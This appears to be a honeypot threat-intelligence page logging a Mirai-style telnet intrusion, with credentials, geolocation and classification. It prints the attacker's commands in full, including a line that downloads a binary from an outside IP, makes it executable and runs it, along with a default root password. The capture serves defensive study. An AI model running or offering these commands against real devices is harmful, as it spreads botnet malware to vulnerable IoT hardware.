Attack #6199 · HoneyMire Hub

Attack #6199 telnet

Captured 2026-05-11 16:39:58Z by Ka on honeypot HoneyMistNano 🟡 C3 SuperMini · firmware 1.

Source175.167.86.226:56009

Authenticatedyes

Commands11

Duration10.3s

Session recording

Loading session…

Transcript

Server output and attacker input as captured, line-grain. The asciicast above is the cinematic version of the same data; everything below is the raw conversation. Captured credentials live in the Credentials card; this transcript starts where the shell session does.

root
25802580
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x49\x47\x50\x50\x46\x45'
/bin/busybox wget;/bin/busybox echo -ne '\x49\x47\x50\x50\x46\x45'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://123.129.39.253:43067/i ||curl -O http://123.129.39.253:43067/i ||/bin/busybox wget http://123.129.39.253:43067/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x48\x41\x41\x41\x45\x4d\x52'

Credentials

Username: root

Password: 25802580

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇨🇳China · Liaoning · Shenyang

China Unicom Liaoning Province Network · AS4837 CHINA UNICOM China169 Backbone · 41.78,123.43

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x49\x47\x50\x50\x46\x45'
/bin/busybox wget;/bin/busybox echo -ne '\x49\x47\x50\x50\x46\x45'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://123.129.39.253:43067/i ||curl -O http://123.129.39.253:43067/i ||/bin/busybox wget http://123.129.39.253:43067/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x48\x41\x41\x41\x45\x4d\x52'

Reported to threat intel

AlienVault OTX ✓

HoneyMire Hub · open feed: / · API: /api · docs: /docs · about: /about · firmware: github.com/KaSt/HoneyMire